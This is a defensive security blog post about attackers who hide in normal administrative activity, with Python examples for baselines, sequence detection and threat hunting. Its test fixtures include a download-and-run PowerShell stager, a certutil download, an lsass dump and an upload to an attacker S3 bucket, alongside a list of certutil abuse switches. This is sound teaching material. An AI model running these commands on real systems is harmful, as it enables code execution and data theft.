The Attack That Looked Exactly Like Work
Nobody flagged the PowerShell script.
It ran every morning at 7:52am — same time the IT team ran their routine maintenance scripts. It queried Active Directory for group memberships — the same query the helpdesk ran daily for access requests. It made outbound HTTPS connections to a cloud storage endpoint — the same pattern as the company’s approved backup tools.
For 58 days, it ran without interruption. Your SIEM saw it. Your EDR logged it. Your analysts scrolled past it in the morning triage queue — not because they were negligent, but because it looked exactly like everything else. Same tools. Same timing. Same traffic patterns. Same everything.
Except it was exfiltrating 4GB of customer data every 72 hours to an attacker-controlled S3 bucket.
The script wasn’t sophisticated. The attacker wasn’t particularly skilled. What they were was patient and observant — they had spent two weeks studying the environment’s normal behavior patterns before executing anything. They knew when maintenance scripts ran. They knew which cloud endpoints were whitelisted. They knew what volume of outbound traffic was normal enough to avoid anomaly detection.
They didn’t evade your security tools.
They dressed the attack in the clothes your security tools were trained to trust.
The Camouflage Principle
Every detection system is built around a fundamental assumption: that malicious activity looks different from legitimate activity.
Signatures detect known-bad code. Behavioral rules fire on anomalous patterns. Anomaly detection flags deviations from established baselines. The entire architecture of modern security tooling rests on the ability to distinguish the malicious from the normal.
Attackers who understand this architecture don’t try to defeat it. They sidestep it entirely — by making malicious activity indistinguishable from normal activity. Not by being more sophisticated. By being more observant.
This is the camouflage principle, and it is now the dominant operational approach in enterprise intrusions:
- Use the tools that already exist on the target system
- Operate during hours when legitimate activity is highest
- Move at the speed of normal administrative operations
- Generate the same traffic volumes as legitimate business processes
- Authenticate with real credentials to real systems
When you do all of these things, you don’t appear in the alert queue. You appear in the log file — alongside ten thousand other entries that look exactly like you — and nobody has the time or the detection logic to tell you apart.
The Mandiant M-Trends 2024 report found that Living Off the Land techniques appeared in over 70% of significant enterprise intrusions — making it the dominant attack methodology, not an edge case.
Your perimeter blocked the unfamiliar. The familiar walked right in.
The Attacker’s Observational Playbook
Before executing anything, sophisticated attackers study. The reconnaissance phase of a modern enterprise intrusion isn’t just network scanning — it’s behavioral analysis of the target environment. Understanding what normal looks like, so that malicious activity can be dressed to match.
Here’s exactly what they’re observing — and how that observation becomes operational camouflage.
“What Tools Are Already Here?”
The first question isn’t “what exploit can I use?” It’s “what legitimate tools are on this system that I can repurpose?”
Every Windows endpoint comes preinstalled with a toolkit that, in the hands of an attacker with valid credentials, enables almost every phase of an intrusion without touching a single external tool:
PowerShell — remote command execution, credential extraction, network enumeration, data staging, and exfiltration. Native to every Windows system. Deeply trusted by security tooling. Generates logs that look identical to legitimate administrative use, and unless Script Block Logging (event ID 4104) is enabled, the content of what it actually ran is often not recorded at all.
WMI (Windows Management Instrumentation) — remote system queries, lateral movement, persistence via WMI subscriptions, process execution on remote hosts. Runs as a system process. Generates minimal default logging. Trusted by every security product that doesn’t have WMI-specific behavioral rules.
certutil.exe — designed for certificate management. Used by attackers to download payloads, decode Base64-encoded files, and cache arbitrary content. A Microsoft-signed binary present on every Windows system. Rarely flagged.
mshta.exe, regsvr32.exe, rundll32.exe — legitimate Windows binaries routinely abused to execute malicious code while appearing to the process list as trusted system processes.
Cloud CLIs (aws cli, az cli, gcloud) — installed in most development environments. Used by attackers to enumerate cloud resources, exfiltrate data to attacker-controlled storage, and move laterally between cloud accounts. Every command looks like developer activity.
The attacker’s toolkit is your IT team’s toolkit. Trying to block it means blocking the tools your operations depend on. Not blocking it means the attacker operates invisibly.
“When Does Normal Activity Happen?”
Timing is camouflage.
A PowerShell script executing at 3am on a user workstation is anomalous. The same script executing at 8:15am alongside the ten other scripts your IT team runs during morning operations is invisible.
Attackers who have observed an environment’s operational rhythms time their activity to blend into the busiest windows:
- Morning operations — when IT scripts run, when employees log in, when backup jobs execute, when cloud deployments kick off
- Business hours — when high volumes of legitimate user activity mask individual anomalous events
- Change windows — when configuration changes are expected, when unusual system behavior is attributed to scheduled maintenance
- Patch cycles — when vulnerability scan traffic and system restarts create noise that obscures attacker activity
The Midnight Blizzard intrusion methodology (Microsoft’s name for the actor also tracked as APT29 and Cozy Bear, and previously as NOBELIUM in Microsoft’s own taxonomy), publicly documented by Microsoft, explicitly includes timing activity to coincide with periods of normal administrative activity in the target environment. This isn’t tradecraft reserved for nation-state actors. It has been adopted broadly across the attacker ecosystem precisely because it works against alert-threshold-based detection.
Your detection thresholds were calibrated on average traffic patterns. Attackers who know your patterns can route around every threshold you’ve set.
“What Does Normal Traffic Volume Look Like?”
Volume-based anomaly detection fires when traffic patterns deviate from baselines. Attackers who know the baseline operate within it.
The scenario from the opening of this blog — 4GB of exfiltration every 72 hours — was designed around exactly this principle. The attacker had observed that the organization’s backup traffic averaged 3–5GB per day to approved cloud endpoints. By exfiltrating at the same volume, to an endpoint using the same HTTPS port, at similar times of day, they operated within the baseline’s normal range.
This is not a technically advanced technique. It requires only patience and observation. And it defeats volume-based and threshold-based anomaly detection entirely — because nothing crosses a threshold if you deliberately stay below it.
Data exfiltration that looks like backup traffic, lateral movement that looks like IT administration, reconnaissance that looks like helpdesk activity — these aren’t sophisticated evasion techniques. They’re patient imitation of what you’ve already told your detection systems to trust.
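As an added example, not code from the original post, here is a Python sketch of the gap just described: a global daily egress threshold, learned from a constructed twelve-day history of backup traffic, does not fire on a day that adds a 1.4 GB upload to a never-seen bucket, while a per-destination baseline over the same history flags it. The endpoint names, the traffic figures and the 3-sigma threshold with a stdev floor are assumptions of the example.

```python
"""Global egress threshold vs. per-destination baseline, over constructed flow summaries."""
from collections import defaultdict
from statistics import mean, pstdev

MB = 1_000_000
APPROVED_BACKUP = "corp-backups.s3.amazonaws.com"    # assumed approved backup endpoint
NEW_BUCKET = "attacker-bucket.s3.amazonaws.com"      # hypothetical attacker-controlled bucket


def constructed_history(days=12):
    """Constructed history of (day, destination, bytes): backup traffic cycling through
    3.0-5.0 GB/day plus a small, steady API flow. Not real telemetry."""
    pattern_mb = [3_000, 3_800, 4_600, 5_000]
    rows = []
    for d in range(days):
        rows.append((d, APPROVED_BACKUP, pattern_mb[d % 4] * MB))
        rows.append((d, "api.github.com", 50 * MB))
    return rows


# Constructed "today": backup at the low end of its range, plus 1.4 GB to a never-seen bucket.
TODAY = [
    (12, APPROVED_BACKUP, 3_000 * MB),
    (12, "api.github.com", 50 * MB),
    (12, NEW_BUCKET, 1_400 * MB),
]


def threshold(values, k=3.0, floor_fraction=0.10):
    """mean + k*stdev, with a stdev floor so a perfectly flat history does not alert on jitter."""
    mu = mean(values)
    sigma = max(pstdev(values), floor_fraction * mu)
    return mu + k * sigma


def daily_totals(rows):
    totals = defaultdict(int)
    for day, _dst, nbytes in rows:
        totals[day] += nbytes
    return totals


def per_destination_series(rows):
    series = defaultdict(lambda: defaultdict(int))
    for day, dst, nbytes in rows:
        series[dst][day] += nbytes
    return series


def global_check(history, today, k=3.0):
    """Environment-wide rule: does today's total outbound volume exceed the historical threshold?"""
    limit = threshold(list(daily_totals(history).values()), k)
    return sum(nbytes for _day, _dst, nbytes in today) > limit


def per_destination_check(history, today, k=3.0):
    """Per-destination rule: flag destinations never seen in history, and known destinations
    whose volume today exceeds their own threshold."""
    series = per_destination_series(history)
    days = sorted({day for day, _dst, _b in history})
    findings = []
    for _day, dst, nbytes in today:
        if dst not in series:
            findings.append((dst, "new destination", nbytes))
            continue
        values = [series[dst].get(day, 0) for day in days]   # zero-fill days with no traffic
        if nbytes > threshold(values, k):
            findings.append((dst, "volume above own baseline", nbytes))
    return findings


if __name__ == "__main__":
    hist = constructed_history()
    # Today's 4.45 GB total sits inside the 3.05-5.05 GB range the global rule learned.
    print("global threshold fired:", global_check(hist, TODAY))
    for finding in per_destination_check(hist, TODAY):
        print("per-destination finding:", finding)
```

The per-destination view also catches the quieter case of a known endpoint that starts receiving far more than its own history allows, which the global view absorbs just as easily.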
“What Credentials Are Available?”
The cleanest camouflage is valid authentication.
An attacker operating with a legitimate, authorized credential isn’t generating unauthorized access alerts — because the access is authorized. The account exists. The password is correct. The access policies permit the connection. Every security control that checks authentication sees a green light.
This is why credential compromise is the primary attack vector across virtually every major breach category. Not because attackers can’t find other ways in — but because valid credentials are the most effective camouflage available.
The specific credential categories most frequently exploited for their camouflage value:
Service accounts — typically have broad network access, often run without MFA, frequently have non-expiring passwords, and rarely have human behavioral baselines established because no human uses them interactively. An attacker operating as a service account is invisible to detection systems that baseline human user behavior.
Dormant privileged accounts — administrator accounts that haven’t been used in months, belonging to former employees, contractors, or deprovisioned systems. When activated by an attacker, they generate authentic-looking authentication events for accounts that show no prior anomalous activity.
Developer credentials — engineers with production access as a side effect of their development role. Broad permissions, active usage patterns, high tolerance for unusual API calls and infrastructure queries. An attacker wearing a developer credential can enumerate cloud infrastructure extensively without generating anomalous-looking behavior.
Every compromised credential is a disguise. The better the credential, the better the disguise.
Why Your Detection Stack Is Specifically Blind to This
The camouflage principle isn’t new. Security vendors know about Living Off the Land techniques. MITRE ATT&CK documents them exhaustively. Detection rules exist for many of them.
So why do they keep working?
Signature Rules Can’t Catch Intent
A PowerShell command that enumerates Active Directory group memberships is a PowerShell command that enumerates Active Directory group memberships — whether run by your helpdesk or by an attacker with a stolen credential.
Signature-based detection fires on known-bad indicators: specific tool names, specific command strings, specific file hashes. It cannot fire on the question “is this legitimate administrative activity or attacker reconnaissance?” because the log entry for both is identical. Intent doesn’t appear in the log file.
To catch behavior-based camouflage, you need behavior-based detection — rules that fire not on what a command does, but on whether the context in which it runs deviates from established normal behavior for that account, on that system, at that time.
Behavioral Baselines Are Expensive and Rare
Behavior-based detection requires behavioral baselines — a defined picture of what normal looks like for every user, every service account, every system, every data flow — that anomalies are measured against.
Building those baselines takes time: typically 30–90 days of observation before anomaly detection becomes meaningful. It requires data from every relevant source — endpoint, network, identity, cloud — to build a complete picture rather than a fragmented one. And it requires continuous maintenance as environments change and baselines drift.
Most organizations have not made this investment. Their detection systems fire on signatures and static thresholds — neither of which catches an attacker who has studied the environment carefully enough to operate within both.
The UEBA market — User and Entity Behavior Analytics — exists precisely to address this gap. Platforms like Microsoft Sentinel UEBA, Splunk UEBA, and Exabeam build and maintain behavioral baselines automatically, scoring deviations in real time. But UEBA deployment without baseline calibration is noise, and most deployments are under-calibrated because the investment in tuning hasn’t been made.
The detection capability that catches camouflage attacks exists. Most organizations just haven’t built it yet.
Alert Volume Buries the Needle
Even when behavioral anomalies are detected, they’re often buried.
A service account making an unusual LDAP query generates a low-confidence behavioral alert. In a queue of 1,200 daily alerts — 94% of which are false positives — a low-confidence finding from an unfamiliar detection rule gets deprioritized. The analyst closes it as inconclusive and moves to the next ticket.
The attacker didn’t defeat the detection rule. They benefited from the operational reality that low-confidence alerts are processed quickly and rarely escalated.
Camouflage doesn’t need to be perfect. It just needs to generate enough uncertainty to slip through a triage process under time pressure.
What Actually Catches Camouflaged Attacks
Camouflage-based techniques are specifically designed to defeat the detection approaches most organizations rely on. Catching them requires detection approaches most organizations haven’t built.
Behavioral Baselines That Go Deep Enough to Matter
Surface-level behavioral detection — “this account logged in outside business hours” — is not sufficient to catch a sophisticated attacker who has studied your environment. They know your business hours. They operate inside them.
Effective behavioral baselines need to be specific enough to distinguish between:
- A PowerShell script run by IT at 8:15am as part of a documented maintenance procedure, and the same script run by a compromised service account at 8:17am for the first time in its operational history
- A developer querying cloud resource metadata as part of a deployment workflow, and the same query running from an account that has never previously made that API call
- File access in line with a user’s documented role and historical pattern, and the same access volume happening on systems the user has never previously accessed
This level of specificity requires account-level, system-level behavioral baselines — not environment-wide averages. Tools like Exabeam, Securonix, and Microsoft Sentinel UEBA build these per-entity models automatically from historical telemetry. They score every event not against a global threshold but against what is normal for that specific entity — making the “this looks like administrative activity” camouflage far less effective.
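The three distinctions above reduce to one question per event: has this specific entity done this, from here, before? The following Python, added as an illustration and not taken from any of the products named, keeps a per-account set of actions, hosts and observed days, scores new events against it, and refuses to call anything "first seen" for an account with too little history. Account names, hosts, the 30-day constructed history and the 14-day maturity cut-off are assumptions of the example.

```python
"""Per-entity first-seen baseline over constructed identity and endpoint events."""
from collections import defaultdict
from datetime import datetime, timedelta

MIN_BASELINE_DAYS = 14   # assumption: below this, "first seen" means "new entity", not "anomaly"


def constructed_history():
    """Constructed 30 days of (time, account, host, action) events. Not real telemetry."""
    start = datetime(2024, 3, 1, 8, 15)
    events = []
    for d in range(30):
        t = start + timedelta(days=d)
        events.append((t, "svc-maint", "ADMIN-01", "powershell:Get-ADGroupMember"))
        events.append((t + timedelta(minutes=3), "helpdesk1", "HD-WS07", "powershell:Get-ADGroupMember"))
        events.append((t + timedelta(hours=1), "svc-backup", "BACKUP-01", "https:corp-backups.s3.amazonaws.com"))
        if d % 2 == 0:   # developer active every other day: 15 distinct days of evidence
            events.append((t, "dev-alice", "DEV-LAPTOP-3", "aws:ec2:DescribeInstances"))
    events.append((start + timedelta(days=29), "contractor-bob", "CTR-WS01", "powershell:Get-ADUser"))
    return events


class EntityBaseline:
    """What each account has been seen doing, from where, and on how many distinct days."""

    def __init__(self):
        self.actions = defaultdict(set)
        self.hosts = defaultdict(set)
        self.days = defaultdict(set)

    def learn(self, events):
        for t, account, host, action in events:
            self.actions[account].add(action)
            self.hosts[account].add(host)
            self.days[account].add(t.date())

    def score(self, event):
        """Return (verdict, reasons). Verdicts: normal, anomalous, immature_baseline."""
        _t, account, host, action = event
        if len(self.days[account]) < MIN_BASELINE_DAYS:
            return "immature_baseline", []
        reasons = []
        if action not in self.actions[account]:
            reasons.append(f"first time {account} performed {action}")
        if host not in self.hosts[account]:
            reasons.append(f"first time {account} was active from {host}")
        return ("anomalous" if reasons else "normal"), reasons


def global_action_count(events, action):
    """The environment-wide view: how often an action ran, regardless of who ran it."""
    return sum(1 for _t, _a, _h, act in events if act == action)


# Constructed "day 31": the helpdesk query as usual, the same query from a service account
# that has never made it, a developer's first S3 upload, and a brand-new account.
DAY31 = datetime(2024, 3, 31, 8, 15)
TODAY = [
    (DAY31, "helpdesk1", "HD-WS07", "powershell:Get-ADGroupMember"),
    (DAY31 + timedelta(minutes=2), "svc-backup", "ADMIN-01", "powershell:Get-ADGroupMember"),
    (DAY31 + timedelta(hours=2), "dev-alice", "DEV-LAPTOP-3", "aws:s3:PutObject"),
    (DAY31 + timedelta(hours=3), "contractor-bob", "CTR-WS01", "powershell:Get-ADGroupMember"),
]


def score_today(history=None, today=None):
    """Learn the baseline from history, then score each of today's events per entity."""
    baseline = EntityBaseline()
    baseline.learn(history if history is not None else constructed_history())
    return [(e[1], *baseline.score(e)) for e in (today if today is not None else TODAY)]


if __name__ == "__main__":
    # Globally, Get-ADGroupMember ran 3 times today instead of 2: noise, not an alert.
    print("global Get-ADGroupMember count today:", global_action_count(TODAY, "powershell:Get-ADGroupMember"))
    for account, verdict, reasons in score_today():
        print(f"{account:15} {verdict:18} {'; '.join(reasons)}")
```

The immature_baseline verdict is the part most deployments skip: a contractor account created yesterday will trip every first-seen rule, and routing that into the same queue as a mature service account doing something new is how the real finding gets buried.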
Sequence Detection Across the Kill Chain
Individual events, well-camouflaged, don’t reveal the attack. The sequence does.
A single LDAP query is normal. An LDAP query followed by a lateral SMB connection to a server that account has never accessed, followed by a credential dump attempt via Task Manager (writing a memory dump of lsass.exe), followed by an outbound connection to a new cloud endpoint: that sequence is an attack chain regardless of how legitimate each individual step looks in isolation.
Kill chain correlation rules — built on MITRE ATT&CK sequences rather than individual technique detection — fire on the pattern rather than the event. They require that multiple events, across multiple data sources, occur in a meaningful sequence within a defined time window before generating an alert.
This is harder to build than single-event rules. It requires cross-source data correlation at a quality and completeness level that many SIEM deployments haven’t achieved. But it is the detection logic that catches camouflaged attacks — because the attacker who has disguised every individual step cannot disguise the sequence that those steps form.
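An added example of the correlation logic described above, written in Python for illustration rather than taken from any SIEM: raw events from LDAP, SMB, process and proxy sources are mapped to ATT&CK tactics, and an account is reported only when the four tactics occur in kill-chain order inside a time window. The event set, the tactic mapping and the 24-hour window are constructed assumptions; the IT admin and helpdesk accounts perform the same individual steps without completing the sequence.

```python
"""Kill-chain sequence detection over constructed multi-source events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Required tactic order. Each step is mundane on its own; the ordered set is not.
KILL_CHAIN = ["discovery", "lateral_movement", "credential_access", "exfiltration"]
WINDOW = timedelta(hours=24)   # assumption: all four steps must fall inside this window


def classify(source, detail):
    """Map one raw event to a tactic. Constructed mapping covering only this example's sources."""
    d = detail.lower()
    if source == "ldap" or "get-adgroupmember" in d:
        return "discovery"
    if source == "smb" and "admin$" in d:
        return "lateral_movement"
    if source == "process" and "lsass" in d:
        return "credential_access"
    if source == "proxy" and d.startswith("put "):
        return "exfiltration"
    return None


def find_chains(events, order=KILL_CHAIN, window=WINDOW):
    """One finding per account whose tactic sequence contains `order` as an in-order
    subsequence that starts at a discovery event and completes within `window`."""
    by_account = defaultdict(list)
    for e in events:
        by_account[e["account"]].append(e)
    findings = []
    for account, evs in by_account.items():
        ordered = sorted(evs, key=lambda e: e["time"])
        labelled = [(e["time"], classify(e["source"], e["detail"]), e) for e in ordered]
        labelled = [x for x in labelled if x[1] is not None]
        for i, (t0, tactic0, first) in enumerate(labelled):
            if tactic0 != order[0]:
                continue
            matched, step = [first], 1
            for t, tactic, e in labelled[i + 1:]:
                if t - t0 > window:
                    break
                if tactic == order[step]:
                    matched.append(e)
                    step += 1
                    if step == len(order):
                        findings.append({"account": account, "start": t0, "end": t, "events": matched})
                        break
            if step == len(order):
                break   # report the first complete chain per account
    return findings


def constructed_events():
    """Constructed events from four sources for one morning. Not real telemetry."""
    base = datetime(2024, 3, 12, 8, 0)

    def ev(minutes, account, source, detail):
        return {"time": base + timedelta(minutes=minutes), "account": account,
                "source": source, "detail": detail}

    return [
        # Routine IT: discovery then lateral movement, and nothing further.
        ev(15, "it-admin", "ldap", "Get-ADGroupMember -Identity 'Domain Admins'"),
        ev(20, "it-admin", "smb", r"\\FILESRV-01\ADMIN$"),
        # Helpdesk: discovery only, as every day.
        ev(18, "helpdesk1", "ldap", "Get-ADGroupMember -Identity 'VPN Users'"),
        # Compromised service account: each step looks like administration; the order does not.
        ev(17, "svc-backup", "ldap", "Get-ADGroupMember -Identity 'Domain Admins'"),
        ev(52, "svc-backup", "smb", r"\\FILESRV-02\ADMIN$"),
        ev(100, "svc-backup", "process", "taskmgr.exe -> lsass.exe (Create dump file)"),
        ev(130, "svc-backup", "proxy", "PUT https://attacker-bucket.s3.amazonaws.com/archive.zip 1400000000"),
        # Developer: an upload before any discovery is not a chain in this order.
        ev(5, "dev-alice", "proxy", "PUT https://artifacts.example.com/build.zip 900000"),
        ev(30, "dev-alice", "ldap", "Get-ADGroupMember -Identity 'Developers'"),
    ]


if __name__ == "__main__":
    for f in find_chains(constructed_events()):
        print(f["account"], f["start"].time(), "->", f["end"].time())
        for e in f["events"]:
            print("   ", e["source"], e["detail"])
```

Order and window are what make this a sequence rule rather than four single-event rules OR'd together: the developer's upload followed by an LDAP query matches every tactic label but never forms the chain, and shrinking the window to an hour drops the service-account finding too.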
Deception Technology
If the attacker is observing the environment to understand normal behavior, deception technology turns that observation against them.
Honeypots, honeytokens, and deception-based detection, whether from platforms like Attivo Networks (now part of SentinelOne) and Illusive Networks (now part of Proofpoint) or from Thinkst’s free Canarytokens service, plant fake assets, credentials, and data throughout the environment. These decoys look authentic to an attacker conducting reconnaissance. They appear in AD queries, show up in file shares, sit in credential stores.
Any interaction with a decoy asset is suspicious by construction: no legitimate user or process has a reason to touch a decoy credential or connect to a honeypot, so there is no baseline to learn and no threshold to tune. The interaction itself is the detection event. The practical caveat is that vulnerability scanners, backup indexers, and curious administrators will also touch decoys unless they are excluded, so the false-positive rate is near zero only once those known sources are carved out.
An attacker who studies your environment carefully enough to copy its normal behavior is likely to encounter your decoys, because decoys are placed exactly where a reconnaissance sweep would look. The more thorough the attacker’s observation, the more likely they are to trigger a deception detection.
This inverts the camouflage principle entirely: the attacker’s strength — careful observation — becomes their exposure.
Threat Hunting Focused on LOL Techniques
Reactive detection waits for alerts. Threat hunting goes looking for what isn’t alerting.
For camouflage-based attacks specifically, effective hunts start from the LOL techniques most commonly used against your industry and go looking for their fingerprints in the telemetry — regardless of whether any rule fired.
High-value hunt hypotheses for camouflage detection:
Are there PowerShell executions with encoded command parameters running from user workstations outside the IT team’s documented scope? Legitimate IT scripts are typically documented and attributable. Encoded PowerShell from a finance workstation rarely has a legitimate explanation, although some management agents and installers do use -EncodedCommand, so decode the Base64 (it is UTF-16LE text) and read what it runs before judging.
Are there certutil.exe executions performing download (-urlcache) or decode (-decode, -decodehex) operations that don’t correspond to documented certificate management activities? Any certutil execution not tied to a known certificate operation warrants investigation.
Are service accounts making authentication attempts to systems outside their documented operational scope? Service accounts have defined functions. Authentication outside that scope — even with valid credentials — is anomalous regardless of whether it looks like administrative activity.
Are there outbound HTTPS connections to cloud storage endpoints that aren’t in your approved cloud service catalog? Exfiltration to an attacker-controlled S3 bucket looks identical to backup traffic — unless you’re comparing the destination to your approved endpoint list.
None of these hunts require new tools. They require someone asking the question and going to look for the answer — rather than waiting for a rule that may have been specifically designed around not firing on normal-looking activity.
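The four hunts above expressed as predicates over constructed endpoint and proxy events, as an added Python example rather than a query from any particular SIEM. It decodes -EncodedCommand arguments (base64 over UTF-16LE, including the abbreviations PowerShell accepts) so the analyst sees what actually ran, matches certutil’s download and decode switches, checks a service account against its documented host scope, and compares cloud-storage destinations to an approved list. Host names, the scope tables, the approved endpoint, the documentation-range IP and the sample command lines are assumptions of the example.

```python
"""Four LOL-technique hunt predicates over constructed endpoint and proxy telemetry."""
import base64
import binascii

# Constructed scope data: assumptions for the example, not a real inventory.
IT_SCOPE_HOSTS = {"ADMIN-01", "ADMIN-02"}
SERVICE_ACCOUNT_SCOPE = {"svc-backup": {"BACKUP-01", "FILESRV-01"}}
APPROVED_CLOUD = {"corp-backups.s3.amazonaws.com"}
STORAGE_SUFFIXES = (".s3.amazonaws.com", ".blob.core.windows.net", ".storage.googleapis.com")
CERTUTIL_ABUSE = ("-urlcache", "-decode", "-decodehex", "-encode")


def encode_ps(command):
    """Build a -EncodedCommand argument the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """If the command line carries -EncodedCommand (or an accepted abbreviation: -e, -ec,
    -en, -enc, ...), return the decoded script; otherwise None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        if flag in ("-e", "-ec") or (flag.startswith("-en") and "-encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def hunt(events):
    """Return (hunt_name, host, user, detail) for every event matching one of the four hypotheses."""
    findings = []
    for e in events:
        detail = e.get("cmdline") or e.get("dst", "")
        scope = SERVICE_ACCOUNT_SCOPE.get(e["user"])
        if scope is not None and e["host"] not in scope:
            findings.append(("service_account_out_of_scope", e["host"], e["user"], detail))
        if e["type"] == "process":
            image = e["image"].lower()
            if image.endswith("powershell.exe") and e["host"] not in IT_SCOPE_HOSTS:
                decoded = decode_encoded_command(e["cmdline"])
                if decoded is not None:
                    findings.append(("encoded_powershell_outside_it", e["host"], e["user"], decoded))
            if image.endswith("certutil.exe") and any(a in e["cmdline"].lower() for a in CERTUTIL_ABUSE):
                findings.append(("certutil_download_or_decode", e["host"], e["user"], e["cmdline"]))
        elif e["type"] == "network":
            dst = e["dst"].lower()
            if dst.endswith(STORAGE_SUFFIXES) and dst not in APPROVED_CLOUD:
                findings.append(("unapproved_cloud_storage", e["host"], e["user"], dst))
    return findings


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"


def constructed_events():
    """Constructed process and network events. 203.0.113.10 is a documentation-range address."""
    return [
        {"type": "process", "host": "FIN-WS12", "user": "jdoe", "image": PS_IMAGE,
         "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_ps(STAGER)},
        {"type": "process", "host": "ADMIN-01", "user": "svc-maint", "image": PS_IMAGE,
         "cmdline": "powershell.exe -ec " + encode_ps("Get-ADGroupMember -Identity 'Domain Admins'")},
        {"type": "process", "host": "FIN-WS12", "user": "jdoe", "image": r"C:\Windows\System32\certutil.exe",
         "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/x.txt x.txt"},
        {"type": "process", "host": "ADMIN-02", "user": "svc-maint", "image": r"C:\Windows\System32\certutil.exe",
         "cmdline": "certutil.exe -store My"},
        {"type": "process", "host": "FILESRV-02", "user": "svc-backup", "image": r"C:\Windows\System32\cmd.exe",
         "cmdline": "cmd.exe /c whoami /all"},
        {"type": "network", "host": "BACKUP-01", "user": "svc-backup", "dst": "corp-backups.s3.amazonaws.com"},
        {"type": "network", "host": "FIN-WS12", "user": "jdoe", "dst": "attacker-bucket.s3.amazonaws.com"},
    ]


if __name__ == "__main__":
    for name, host, user, detail in hunt(constructed_events()):
        print(f"{name:32} {host:10} {user:11} {detail}")
```

The encoded-command hunt is the one worth running even on IT hosts: here it is scoped out for ADMIN-01 to keep the queue short, but the decoded text is what lets an analyst tell a documented maintenance script from a download stager in seconds, without guessing from the host name.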
The Operational Shift That Closes the Gap
Catching attackers who exploit normal behavior requires a fundamental shift in detection philosophy — from “is this known bad?” to “is this normal for this specific entity, at this specific time, in this specific context?”
That shift has three practical components:
1. Invest in per-entity behavioral baselines. Environment-wide thresholds don’t catch entity-level anomalies. An attacker operating a compromised service account within the environment’s normal parameters will never cross a global threshold. They will deviate significantly from that specific service account’s individual baseline — if one exists and is being monitored.
2. Build detection logic on sequences, not events. Single-event rules are the attackers’ preferred target because individual events can be made to look normal. Sequence-based rules fire on the pattern of an attack regardless of how innocuous each step appears individually.
3. Add deception layers that turn observation into exposure. If attackers study your environment to blend in, plant assets worth studying that report back when touched. The camouflage-based attacker’s most careful reconnaissance is the moment they’re most likely to trigger a deception detection.
None of these require replacing your existing stack. They require extending it — adding the behavioral depth, correlation logic, and deception coverage that makes the “I’ll just look normal” strategy progressively less viable.
The Bottom Line
The most dangerous attacker in your environment right now isn’t the one writing zero-day exploits. It’s the one who spent two weeks watching how your environment behaves — and is now operating inside it wearing the exact clothes your security tools were trained to trust.
Living Off the Land. Valid credentials. Business-hours timing. Normal traffic volumes.
The attack that looks like work is the attack that wins.
Catching it requires moving beyond the binary question of “is this known bad?” to the harder, richer question: “Is this normal for this specific account, this specific system, this specific time — and does this event, in sequence with the three before it, form a pattern that no legitimate operation would produce?”
That question requires behavioral baselines. It requires kill chain correlation. It requires proactive hunting. And it requires deception layers that punish the attacker’s greatest strength — their careful observation of your environment.
The attacker is already studying what normal looks like in your environment.
The question is whether your detection architecture is studying what normal looks like for them.
Your Next Move
Camouflage-based attacks succeed because they’re invisible to detection systems built for obvious threats — and visible only to detection systems built for behavioral anomalies and kill chain sequences.
→ Read next: No Alerts Doesn’t Mean No Threats — It Means You’re Blind — why a quiet dashboard is the most reliable sign that your detection architecture is being successfully exploited, not that your environment is clean.
→ Want to know whether a camouflaged attacker is operating in your environment right now? A behavioral threat hunt uses entity-level baseline analysis and kill chain correlation to go looking for the activity your alert rules aren’t catching — and either finds it or validates that it isn’t there.
